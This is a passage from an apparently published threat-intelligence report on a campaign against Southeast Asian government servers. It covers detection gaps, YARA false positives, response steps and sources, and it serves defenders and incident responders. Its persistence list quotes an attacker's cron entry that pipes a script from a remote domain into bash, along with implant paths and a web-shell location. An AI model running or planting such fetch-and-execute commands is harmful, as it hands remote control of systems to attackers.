The coverage gaps are worth understanding rather than working around. The detection file says plainly that most of these rules are unlikely to fire on live traffic, because the C2 estate produced one callback in fourteen days. Chasing that with more network rules is the wrong instinct; credential resets and web-shell hunting are where the return is.
Several techniques were deliberately left without rules, and the reasons hold up:
- Valid-account use (T1078), the operator’s dominant access method, cannot be distinguished from legitimate logins by any general-purpose signature without the specific compromised usernames as an organization-specific watchlist. That is an account-level control the affected organizations must apply, not something a third-party rule can carry.
- Session-cookie theft and repository browsing (T1539, T1213): the Kejaksaan document theft rides an already-established authenticated session and produces no distinguishing artifact beyond normal traffic to the victim’s own hostnames; a rule keyed to those hostnames would have zero value outside that one organization.
- Commodity and shared indicators: the
chiselfile hash (shared by 179 submitters), thewindows-Utah-*certificate convention, the VPNJantit/Hysteria2/serveo hops, and the Telegram/Discord/GitHub/webhook.site domains were all assessed and cut from rule authoring because a signature on any of them would misattribute or fire on essentially all networks. They live in the IOC feed as hunt context only.
One YARA false positive is worth flagging so it never misleads a hunt. chisel.exe and both Go tunnel binaries trip the family rules PoetRat_Python and android_meterpreter, but those are generic crypto and base64 byte-pattern overlaps on unrelated Go binaries, not a real family match, and no operator script matched any malware-family rule. Treat those hits as noise; they carry no weight in the attribution or detection judgements here.
A caveat travels with every second-actor rule. The GSocket kit’s separate-intruder assessment is MODERATE, not DEFINITE. If future evidence links the two actors, those rules should be re-labelled under the operator’s own set.
15. Response Orientation
This is a brief orientation to what to address, not a procedure for how. Organizations with an active incident should engage their own incident-response team or national CERT; the four national CERTs (Indonesia, Thailand, Malaysia, the Philippines) were notified before publication. Section 14 sets the detection priority order, with the Zimbra web-shell signature first, then the second-actor GSocket loader, then the durable operator anchors ahead of the near-idle live C2. What follows here is what to remove and contain.
Persistence targets to find and remove.
- The five malicious cron entries on
svr1.nast.ph, includingcurl https://localroot.sbs/cat.sh | bash. - The four daemon-masquerade implants
/home/nast/netd,/home/nast/authd,/home/nast/bootcfg,/home/nast/udevd-sync. - Any
authorized_keysentry matching the operator injection pubkeySHA256:b2sH9INF…BGCE. - Any
shell.jspunder/opt/zimbra/**/webapps/zimbra/.
Containment categories.
- Notify and reset credentials for confirmed and credential-possessed government systems (via the national CERTs).
- Rotate every account the operator is confirmed or assessed to hold, across all four countries.
- Eradicate the host-level GSocket implants on the Philippine server.
- Block the second-actor loader domain and hashes at the perimeter.
- Patch the exposed edge products (Ivanti, Zimbra, Exchange, Moodle) and audit Tableau for the SSRF and SAML techniques.
16. References and Sources
Threat-intelligence context in Section 9 draws on the following public sources; full tiered sourcing is retained in the investigation record.
- CISA, AA24-060B: Ivanti Connect Secure/Policy Secure exploitation (Tier 1). cisa.gov
- CISA, AA21-062A: Microsoft Exchange / ProxyLogon mass exploitation (Tier 1). cisa.gov
- Censys, “The Mass Exploitation of Ivanti Connect Secure” (Tier 3). censys.com
- Securelist / Kaspersky, “Ongoing exploitation of CVE-2022-41352 (Zimbra 0-day)” (Tier 2). securelist.com
- Rapid7 Vulnerability & Exploit Database: Zimbra CVE-2022-41352, Moodle CVE-2020-25627/-25629/-25630 entries (Tier 3). rapid7.com
- Jenkins Security Advisory 2024-03-06: CVE-2024-28149 (Jenkins HTML Publisher Plugin, not Tableau) (Tier 1). jenkins.io
- GitHub Advisory Database, GHSA-4hxw-gc2q-f6f3: CVE-2024-51758 (Filament PHP framework, not Tableau) (Tier 1). github.com
- Seiso Security, “Exploiting Tableau Site-Specific SAML”: CVE-2020-6939, closest genuine match for the SAML technique (Tier 3). seisollc.com
- frycos, “Tableau Server - There Ain’t No Vulns”: closest match for the SSRF-to-metadata technique (Tier 3). frycos.github.io
- Halcyon, “Cloudzy with a Chance of Ransomware” (Tier 3); CyberScoop corroboration: AS14956/Cloudzy reputational context.
- Red Canary Threat Detection Report, “VPN Abuse” (Tier 3): free-VPN anonymization abuse pattern.
- Hysteria 2 official protocol documentation (Tier 1); MITRE ATT&CK T1572: Protocol Tunneling reference.
- hackerschoice/gsocket official README (Tier 1); SANS Internet Storm Center GSocket bash-script backdoor diary (Tier 2/3); Sansec GSocket /
defunct.datresearch (Tier 3); Elastic Security Labs, “Betting on Bots” / REF6138 (Tier 2): GSocket second-actor context. - MITRE ATT&CK group profiles G0121 (SideWinder) and G0129 (Mustang Panda); ITSEC Asia / CybersecAsia and intellibron.io RagaSerpent reporting (Tier 3): named-comparator exclusion.
- Hunt.io (with researcher Bob Diachenko), “Thailand’s Ministry of Finance Targeted With Hermes AI Agent Running Unattended, Hades Implant Staged” (Tier 3), hunt.io, 2026-07-23: independent, unconnected Thai government targeting noted in Section 9.4.
© 2026 Joseph, The Hunters Ledger. Licensed under CC BY 4.0, free to republish and adapt, including commercially, with attribution to The Hunters Ledger and a link to the original.